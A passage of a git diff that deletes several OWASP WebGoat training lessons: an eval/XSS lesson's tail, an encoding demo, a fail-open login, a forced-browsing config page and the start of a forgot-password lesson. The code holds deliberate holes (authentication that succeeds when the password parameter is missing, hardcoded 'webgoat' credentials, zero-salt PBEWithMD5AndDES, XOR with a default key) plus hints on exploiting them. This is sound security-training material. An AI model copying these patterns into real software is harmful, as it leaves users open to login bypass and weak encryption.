- //
- /**
- * Gets the instructions attribute of the WeakAccessControl object
- *
- * @return The instructions value
- */
- public String getInstructions(WebSession s)
- {
- String instructions = "For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script. In order to pass this lesson, you must 'alert()' document.cookie.";
- return (instructions);
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(120);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the AccessControlScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return "Dangerous Use of Eval";
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
-
- /**
- * Check to see if JSP says they passed the lesson.
- *
- * @param s
- */
- private void checkSuccess(WebSession s)
- {
- javax.servlet.http.HttpSession session = s.getRequest().getSession();
-
- if (session.getAttribute(PASSED) != null)
- {
- makeSuccess(s);
-
- session.removeAttribute(PASSED);
- }
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/Encoding.java b/src/main/java/org/owasp/webgoat/lessons/Encoding.java
deleted file mode 100644
index 677473091..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/Encoding.java
+++ /dev/null
@@ -1,848 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.io.IOException;
-import java.net.URLDecoder;
-import java.net.URLEncoder;
-import java.nio.ByteBuffer;
-import java.nio.CharBuffer;
-import java.nio.charset.Charset;
-import java.nio.charset.CharsetDecoder;
-import java.nio.charset.CharsetEncoder;
-import java.security.MessageDigest;
-import java.security.NoSuchAlgorithmException;
-import java.util.ArrayList;
-import java.util.List;
-import javax.crypto.Cipher;
-import javax.crypto.SecretKey;
-import javax.crypto.SecretKeyFactory;
-import javax.crypto.spec.PBEParameterSpec;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.B;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.util.HtmlEncoder;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Jeff Williams Aspect Security
- * @created October 28, 2003
- */
-
-public class Encoding extends LessonAdapter
-{
- public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
- .addElement(
- new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
- .setVspace(0));
-
- private final static String INPUT = "input";
-
- private final static String KEY = "key";
-
- // local encoders
-
- private static sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
-
- private static sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder();
-
- // encryption constant
-
- private static byte[] salt = { (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00,
- (byte) 0x00, (byte) 0x00 };
-
- /**
- * Returns the base 64 decoding of a string.
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- * @exception IOException
- * Description of the Exception
- */
-
- public static String base64Decode(String str) throws IOException
- {
-
- byte[] b = decoder.decodeBuffer(str);
-
- return (new String(b));
- }
-
- /**
- * Description of the Method
- *
- * @param c
- * Description of the Parameter
- * @return Description of the Return Value
- * @exception IOException
- * Description of the Exception
- */
-
- public static String base64Decode(char[] c) throws IOException
- {
-
- return base64Decode(new String(c));
- }
-
- /**
- * Description of the Method
- *
- * @param c
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String base64Encode(char[] c)
- {
-
- return base64Encode(new String(c));
- }
-
- /**
- * Returns the base 64 encoding of a string.
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String base64Encode(String str)
- {
-
- byte[] b = str.getBytes();
-
- return (encoder.encode(b));
- }
-
- /**
- * Description of the Method
- *
- * @param b
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String base64Encode(byte[] b)
- {
-
- return (encoder.encode(b));
- }
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- protected Element createContent(WebSession s)
- {
-
- ElementContainer ec = new ElementContainer();
-
- try
- {
-
- String userInput = s.getParser().getRawParameter(INPUT, "");
-
- String userKey = s.getParser().getStringParameter(KEY, "");
-
- Table table = new Table();
-
- TR tr = new TR();
-
- tr.addElement(new TD("Enter a string: "));
-
- Input input = new Input(Input.TEXT, INPUT, userInput);
-
- tr.addElement(new TD().addElement(input));
-
- table.addElement(tr);
-
- tr = new TR();
-
- tr.addElement(new TD("Enter a password (optional): "));
-
- Input key = new Input(Input.TEXT, KEY, userKey);
-
- tr.addElement(new TD().addElement(key));
-
- table.addElement(tr);
-
- tr = new TR();
-
- Element b = ECSFactory.makeButton("Go!");
-
- tr.addElement(new TD().setAlign("center").setColSpan(2).addElement(b));
-
- table.addElement(tr);
-
- ec.addElement(table);
-
- ec.addElement(new P());
-
- Table t = new Table();
-
- t.setWidth("100%");
-
- t.setBorder(0);
-
- t.setCellSpacing(1);
-
- t.setCellPadding(4);
-
- String description;
-
- t.addElement(makeTitleRow("Description", "Encoded", "Decoded"));
-
- description = "Base64 encoding is a simple reversable encoding used to encode bytes into ASCII characters. Useful for making bytes into a printable string, but provides no security.";
-
- // t.addElement( makeDescriptionRow( description ) );
- t.addElement(makeRow(description, base64Encode(userInput), base64Decode(userInput)));
- // t.addElement( makeSpacerRow() );
-
- description = "Entity encoding uses special sequences like & for special characters. This prevents these characters from being interpreted by most interpreters.";
-
- t.addElement(makeRow(description, HtmlEncoder.encode(userInput), HtmlEncoder.decode(userInput)));
-
- description = "Password based encryption (PBE) is strong encryption with a text password. Cannot be decrypted without the password";
-
- t.addElement(makeRow(description, encryptString(userInput, userKey), decryptString(userInput, userKey)));
- description = "MD5 hash is a checksum that can be used to validate a string or byte array, but cannot be reversed to find the original string or bytes. For obscure cryptographic reasons, it is better to use SHA-256 if you have a choice.";
-
- t.addElement(makeRow(description, hashMD5(userInput), "Cannot reverse a hash"));
-
- description = "SHA-256 hash is a checksum that can be used to validate a string or byte array, but cannot be reversed to find the original string or bytes.";
-
- t.addElement(makeRow(description, hashSHA(userInput), "N/A"));
-
- description = "Unicode encoding is...";
-
- t.addElement(makeRow(description, "Not Implemented", "Not Implemented"));
-
- description = "URL encoding is...";
-
- t.addElement(makeRow(description, urlEncode(userInput), urlDecode(userInput)));
-
- description = "Hex encoding simply encodes bytes into %xx format.";
-
- t.addElement(makeRow(description, hexEncode(userInput), hexDecode(userInput)));
-
- description = "Rot13 encoding is a way to make text unreadable, but is easily reversed and provides no security.";
-
- t.addElement(makeRow(description, rot13(userInput), rot13(userInput)));
-
- description = "XOR with password encoding is a weak encryption scheme that mixes a password into data.";
-
- t.addElement(makeRow(description, xorEncode(userInput, userKey), xorDecode(userInput, userKey)));
-
- description = "Double unicode encoding is...";
-
- t.addElement(makeRow(description, "Not Implemented", "Not Implemented"));
-
- description = "Double URL encoding is...";
-
- t.addElement(makeRow(description, urlEncode(urlEncode(userInput)), urlDecode(urlDecode(userInput))));
-
- ec.addElement(t);
-
- }
-
- catch (Exception e)
- {
-
- s.setMessage("Error generating " + this.getClass().getName());
-
- e.printStackTrace();
-
- }
-
- if (getLessonTracker(s).getNumVisits() > 3)
- {
- makeSuccess(s);
- }
-
- return (ec);
- }
-
- /**
- * Convenience method for encrypting a string.
- *
- * @param str
- * Description of the Parameter
- * @param pw
- * Description of the Parameter
- * @return String the encrypted string.
- */
-
- public static synchronized String decryptString(String str, String pw)
- {
-
- try
- {
-
- PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec(salt, 20);
-
- SecretKeyFactory kf = SecretKeyFactory.getInstance("PBEWithMD5AndDES");
-
- Cipher passwordDecryptCipher = Cipher.getInstance("PBEWithMD5AndDES/CBC/PKCS5Padding");
-
- char[] pass = pw.toCharArray();
-
- SecretKey k = kf.generateSecret(new javax.crypto.spec.PBEKeySpec(pass));
-
- passwordDecryptCipher.init(Cipher.DECRYPT_MODE, k, ps);
-
- byte[] dec = decoder.decodeBuffer(str);
-
- byte[] utf8 = passwordDecryptCipher.doFinal(dec);
-
- return new String(utf8, "UTF-8");
- }
-
- catch (Exception e)
- {
-
- return ("This is not an encrypted string");
- }
-
- }
-
- /**
- * Convenience method for encrypting a string.
- *
- * @param str
- * Description of the Parameter
- * @param pw
- * Description of the Parameter
- * @return String the encrypted string.
- * @exception SecurityException
- * Description of the Exception
- */
-
- public static synchronized String encryptString(String str, String pw) throws SecurityException
- {
-
- try
- {
-
- PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec(salt, 20);
-
- SecretKeyFactory kf = SecretKeyFactory.getInstance("PBEWithMD5AndDES");
-
- Cipher passwordEncryptCipher = Cipher.getInstance("PBEWithMD5AndDES/CBC/PKCS5Padding");
-
- char[] pass = pw.toCharArray();
-
- SecretKey k = kf.generateSecret(new javax.crypto.spec.PBEKeySpec(pass));
-
- passwordEncryptCipher.init(Cipher.ENCRYPT_MODE, k, ps);
-
- byte[] utf8 = str.getBytes("UTF-8");
-
- byte[] enc = passwordEncryptCipher.doFinal(utf8);
-
- return encoder.encode(enc);
- }
-
- catch (Exception e)
- {
-
- return ("Encryption error");
- }
-
- }
-
- /**
- * Gets the category attribute of the Encoding object
- *
- * @return The category value
- */
-
- protected Category getDefaultCategory()
- {
- return Category.INSECURE_STORAGE;
- }
-
- /**
- * Gets the hints attribute of the HelloScreen object
- *
- * @return The hints value
- */
-
- public List getHints(WebSession s)
- {
-
- List hints = new ArrayList();
- hints.add("Enter a string and press 'go'");
- hints.add("Enter 'abc' and notice the rot13 encoding is 'nop' ( increase each letter by 13 characters ).");
- hints.add("Enter 'a c' and notice the url encoding is 'a+c' ( ' ' is converted to '+' ).");
- return hints;
- }
-
- /**
- * Gets the instructions attribute of the Encoding object
- *
- * @return The instructions value
- */
-
- public String getInstructions(WebSession s)
- {
- return "This lesson will familiarize the user with different encoding schemes. ";
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(15);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
-
- public String getTitle()
- {
- return ("Encoding Basics");
- }
-
- /**
- * Returns the MD5 hash of a String.
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String hashMD5(String str)
- {
-
- byte[] b = str.getBytes();
- MessageDigest md = null;
-
- try
- {
- md = MessageDigest.getInstance("MD5");
- md.update(b);
- } catch (NoSuchAlgorithmException e)
- {
- // it's got to be there
- e.printStackTrace();
- }
- return (base64Encode(md.digest()));
- }
-
- /**
- * Returns the SHA hash of a String.
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String hashSHA(String str)
- {
- byte[] b = str.getBytes();
- MessageDigest md = null;
- try
- {
- md = MessageDigest.getInstance("SHA-256");
- md.update(b);
- } catch (NoSuchAlgorithmException e)
- {
- // it's got to be there
- e.printStackTrace();
- }
- return (base64Encode(md.digest()));
- }
-
- /**
- * Description of the Method
- *
- * @param hexString
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String hexDecode(String hexString)
- {
- try
- {
- if ((hexString.length() % 3) != 0) { return ("String not comprised of Hex digit pairs."); }
- char[] chars = new char[hexString.length()];
- char[] convChars = new char[hexString.length() / 3];
- hexString.getChars(0, hexString.length(), chars, 0);
- for (int i = 1; i < hexString.length(); i += 3)
- {
- String hexToken = new String(chars, i, 2);
- convChars[i / 3] = (char) Integer.parseInt(hexToken, 16);
- }
- return new String(convChars);
- } catch (NumberFormatException nfe)
- {
- return ("String not comprised of Hex digits");
- }
- }
-
- /**
- * Description of the Method
- *
- * @param asciiString
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String hexEncode(String asciiString)
- {
- char[] ascii = new char[asciiString.length()];
- asciiString.getChars(0, asciiString.length(), ascii, 0);
- StringBuffer hexBuff = new StringBuffer();
- for (int i = 0; i < asciiString.length(); i++)
- {
- hexBuff.append("%");
- hexBuff.append(Integer.toHexString(ascii[i]));
- }
- return hexBuff.toString().toUpperCase();
- }
-
- /**
- * The main program for the Encoding class
- *
- * @param args
- * The command line arguments
- */
-
- public static void main(String[] args)
- {
- try
- {
- String userInput = args[0];
- String userKey = args[1];
- System.out.println("Working with: " + userInput);
- System.out.print("Base64 encoding: ");
- System.out.println(base64Encode(userInput) + " : " + base64Decode(userInput));
- System.out.print("Entity encoding: ");
- System.out.println(HtmlEncoder.encode(userInput) + " : " + HtmlEncoder.decode(userInput));
- System.out.print("Password based encryption (PBE): ");
- System.out.println(encryptString(userInput, userKey) + " : " + decryptString(userInput, userKey));
- System.out.print("MD5 hash: ");
- System.out.println(hashMD5(userInput) + " : " + "Cannot reverse a hash");
- System.out.print("SHA-256 hash: ");
- System.out.println(hashSHA(userInput) + " : " + "Cannot reverse a hash");
- System.out.print("Unicode encoding: ");
- System.out.println("Not Implemented" + " : " + "Not Implemented");
- System.out.print("URL encoding: ");
- System.out.println(urlEncode(userInput) + " : " + urlDecode(userInput));
- System.out.print("Hex encoding: ");
- System.out.println(hexEncode(userInput) + " : " + hexDecode(userInput));
- System.out.print("Rot13 encoding: ");
- System.out.println(rot13(userInput) + " : " + rot13(userInput));
- System.out.print("XOR with password: ");
- System.out.println(xorEncode(userInput, userKey) + " : " + xorDecode(userInput, userKey));
- System.out.print("Double unicode encoding is...");
- System.out.println("Not Implemented" + " : " + "Not Implemented");
- System.out.print("Double URL encoding: ");
- System.out.println(urlEncode(urlEncode(userInput)) + " : " + urlDecode(urlDecode(userInput)));
- } catch (Exception e)
- {
- e.printStackTrace();
- }
- }
-
- /**
- * Description of the Method
- *
- * @param value1
- * Description of the Parameter
- * @param value2
- * Description of the Parameter
- * @param description
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- private TR makeRow(String description, String value1, String value2)
- {
-
- TD desc = new TD().addElement(description).setBgColor("#bbbbbb");
- TD val1 = new TD()
- .addElement(new Div().addElement(value1).setStyle("overflow:auto; height:60px; width:100px;"))
- .setBgColor("#dddddd");
- TD val2 = new TD()
- .addElement(new Div().addElement(value2).setStyle("overflow:auto; height:60px; width:100px;"))
- .setBgColor("#dddddd");
- TR tr = new TR();
-
- tr.addElement(desc);
- tr.addElement(val1);
- tr.addElement(val2);
-
- return tr;
- }
-
- /**
- * Description of the Method
- *
- * @param value1
- * Description of the Parameter
- * @param value2
- * Description of the Parameter
- * @param description
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- private TR makeTitleRow(String description, String value1, String value2)
- {
- TD desc = new TD().addElement(new B().addElement(description));
- TD val1 = new TD().addElement(new B().addElement(value1));
- TD val2 = new TD().addElement(new B().addElement(value2));
- desc.setAlign("center");
- val1.setAlign("center");
- val2.setAlign("center");
- TR tr = new TR();
- tr.addElement(desc);
- tr.addElement(val1);
- tr.addElement(val2);
- return (tr);
- }
-
- /**
- * Description of the Method
- *
- * @param input
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static synchronized String rot13(String input)
- {
- StringBuffer output = new StringBuffer();
- if (input != null)
- {
- for (int i = 0; i < input.length(); i++)
- {
- char inChar = input.charAt(i);
- if ((inChar >= 'A') & (inChar <= 'Z'))
- {
- inChar += 13;
- if (inChar > 'Z')
- {
- inChar -= 26;
- }
- }
- if ((inChar >= 'a') & (inChar <= 'z'))
- {
- inChar += 13;
- if (inChar > 'z')
- {
- inChar -= 26;
- }
- }
- output.append(inChar);
- }
- }
- return output.toString();
- }
-
- /**
- * Description of the Method
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String unicodeDecode(String str)
- {
- // FIXME: TOTALLY EXPERIMENTAL
-
- try
- {
- ByteBuffer bbuf = ByteBuffer.allocate(str.length());
- bbuf.put(str.getBytes());
- Charset charset = Charset.forName("ISO-8859-1");
- CharsetDecoder decoder = charset.newDecoder();
- CharBuffer cbuf = decoder.decode(bbuf);
- return (cbuf.toString());
- } catch (Exception e)
- {
- return ("Encoding problem");
- }
- }
-
- /**
- * Description of the Method
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String unicodeEncode(String str)
- {
- // FIXME: TOTALLY EXPERIMENTAL
- try
- {
- Charset charset = Charset.forName("ISO-8859-1");
- CharsetEncoder encoder = charset.newEncoder();
- ByteBuffer bbuf = encoder.encode(CharBuffer.wrap(str));
- return (new String(bbuf.array()));
- } catch (Exception e)
- {
- return ("Encoding problem");
- }
- }
-
- /**
- * Description of the Method
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String urlDecode(String str)
- {
- try
- {
- return (URLDecoder.decode(str, "UTF-8"));
- } catch (Exception e)
- {
- return ("Decoding error");
- }
- }
-
- /**
- * Description of the Method
- *
- * @param str
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static String urlEncode(String str)
- {
- try
- {
- return (URLEncoder.encode(str, "UTF-8"));
- } catch (Exception e)
- {
- return ("Encoding error");
- }
- }
-
- /**
- * Description of the Method
- *
- * @param input
- * Description of the Parameter
- * @param userKey
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static synchronized char[] xor(String input, String userKey)
- {
- if ((userKey == null) || (userKey.trim().length() == 0))
- {
- userKey = "Goober";
- }
- char[] xorChars = userKey.toCharArray();
- int keyLen = xorChars.length;
- char[] inputChars = null;
- char[] outputChars = null;
- if (input != null)
- {
- inputChars = input.toCharArray();
- outputChars = new char[inputChars.length];
- for (int i = 0; i < inputChars.length; i++)
- {
- outputChars[i] = (char) (inputChars[i] ^ xorChars[i % keyLen]);
- }
- }
- return outputChars;
- }
-
- /**
- * Description of the Method
- *
- * @param input
- * Description of the Parameter
- * @param userKey
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static synchronized String xorDecode(String input, String userKey)
- {
- try
- {
- String decoded = base64Decode(input);
- return new String(xor(decoded, userKey));
- } catch (Exception e)
- {
- return "String not XOR encoded.";
- }
- }
-
- /**
- * Description of the Method
- *
- * @param input
- * Description of the Parameter
- * @param userKey
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- public static synchronized String xorEncode(String input, String userKey)
- {
- return base64Encode(xor(input, userKey));
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/FailOpenAuthentication.java b/src/main/java/org/owasp/webgoat/lessons/FailOpenAuthentication.java
deleted file mode 100644
index d464d9646..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/FailOpenAuthentication.java
+++ /dev/null
@@ -1,185 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.IMG;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Jeff Williams Aspect Security
- * @created October 28, 2003
- */
-public class FailOpenAuthentication extends WeakAuthenticationCookie
-{
-
- public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
- .addElement(
- new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
- .setVspace(0));
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- boolean logout = s.getParser().getBooleanParameter(LOGOUT, false);
-
- if (logout)
- {
- s.setMessage("Goodbye!");
- s.eatCookies();
-
- return (makeLogin(s));
- }
-
- try
- {
- String username = "";
- String password = "";
-
- try
- {
- username = s.getParser().getRawParameter(USERNAME);
- password = s.getParser().getRawParameter(PASSWORD);
-
- // if credentials are bad, send the login page
- if (!"webgoat".equals(username) || !password.equals("webgoat"))
- {
- s.setMessage("Invalid username and password entered.");
-
- return (makeLogin(s));
- }
- } catch (Exception e)
- {
- // The parameter was omitted. set fail open status complete
- if (username.length() > 0 && e.getMessage().indexOf("not found") != -1)
- {
- if ((username != null) && (username.length() > 0))
- {
- makeSuccess(s);
- return (makeUser(s, username, "Fail Open Error Handling"));
- }
- }
- }
-
- // Don't let the fail open pass with a blank password.
- if (password.length() == 0)
- {
- // We make sure the username was submitted to avoid telling the user an invalid
- // username/password was entered when they first enter the lesson via the side menu.
- // This also suppresses the error if they just hit the login and both fields are
- // empty.
- if (username.length() != 0)
- {
- s.setMessage("Invalid username and password entered.");
- }
-
- return (makeLogin(s));
-
- }
-
- // otherwise authentication is good, show the content
- if ((username != null) && (username.length() > 0)) { return (makeUser(s, username,
- "Parameters. You did not exploit the fail open.")); }
- } catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- }
-
- return (makeLogin(s));
- }
-
- /**
- * Gets the category attribute of the FailOpenAuthentication object
- *
- * @return The category value
- */
- public Category getDefaultCategory()
- {
- return Category.ERROR_HANDLING;
- }
-
- /**
- * Gets the hints attribute of the AuthenticateScreen object
- *
- * @return The hints value
- */
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("You can force errors during the authentication process.");
- hints.add("You can change length, existance, or values of authentication parameters.");
- hints
- .add("Try removing a parameter ENTIRELY with OWASP ZAP.");
-
- return hints;
- }
-
- /**
- * Gets the instructions attribute of the FailOpenAuthentication object
- *
- * @return The instructions value
- */
- public String getInstructions(WebSession s)
- {
- return "Due to an error handling problem in the authentication mechanism, it is possible to authenticate "
- + "as the 'webgoat' user without entering a password. Try to login as the webgoat user without "
- + "specifying a password.";
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(20);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the AuthenticateScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Fail Open Authentication Scheme");
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/ForcedBrowsing.java b/src/main/java/org/owasp/webgoat/lessons/ForcedBrowsing.java
deleted file mode 100644
index ee05d1aa5..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/ForcedBrowsing.java
+++ /dev/null
@@ -1,150 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Sherif Koussa Software Secured
- * @created November 02, 2006
- */
-public class ForcedBrowsing extends LessonAdapter
-{
-
- private final static String SUCCEEDED = "succeeded";
-
- public final static A MAC_LOGO = new A().setHref("http://www.softwaresecured.com").addElement(new IMG("images/logos/softwaresecured.gif").setAlt("Software Secured").setBorder(0).setHspace(0).setVspace(0));
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- String success = new String(s.getParser().getStringParameter(SUCCEEDED, ""));
-
- if (success.length() != 0 && success.equals("yes"))
- {
- ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat Configuration Page")));
- ec.addElement(new BR());
- Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center");
-
- TR tr = new TR();
- tr.addElement(new TD(new StringElement("Set Admin Privileges for: ")));
-
- Input input1 = new Input(Input.TEXT, "", "");
- tr.addElement(new TD(input1));
- t1.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD(new StringElement("Set Admin Password:")));
-
- input1 = new Input(Input.PASSWORD, "", "");
- tr.addElement(new TD(input1));
- t1.addElement(tr);
-
- Element b = ECSFactory.makeButton("Submit");
- t1.addElement(new TR(new TD(b).setColSpan(2).setAlign("right")));
- ec.addElement(t1);
-
- makeSuccess(s);
- }
- else
- {
- ec
- .addElement("Can you try to force browse to the config page which should only be accessed by maintenance personnel.");
- }
- return ec;
- }
-
- /**
- * Gets the category attribute of the ForgotPassword object
- *
- * @return The category value
- */
- protected Category getDefaultCategory()
- {
- return Category.INSECURE_CONFIGURATION;
- }
-
- /**
- * Gets the hints attribute of the HelloScreen object
- *
- * @return The hints value
- */
- public List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("Try to guess the URL for the config page");
- hints.add("The config page is guessable and hackable");
- hints.add("Play with the URL and try to guess what you can replace 'attack' with.");
- hints.add("Try to navigate to http://localhost/WebGoat/conf");
- return hints;
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(15);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Forced Browsing");
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/ForgotPassword.java b/src/main/java/org/owasp/webgoat/lessons/ForgotPassword.java
deleted file mode 100644
index 358a501e6..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/ForgotPassword.java
+++ /dev/null
@@ -1,335 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import java.util.HashMap;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.B;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
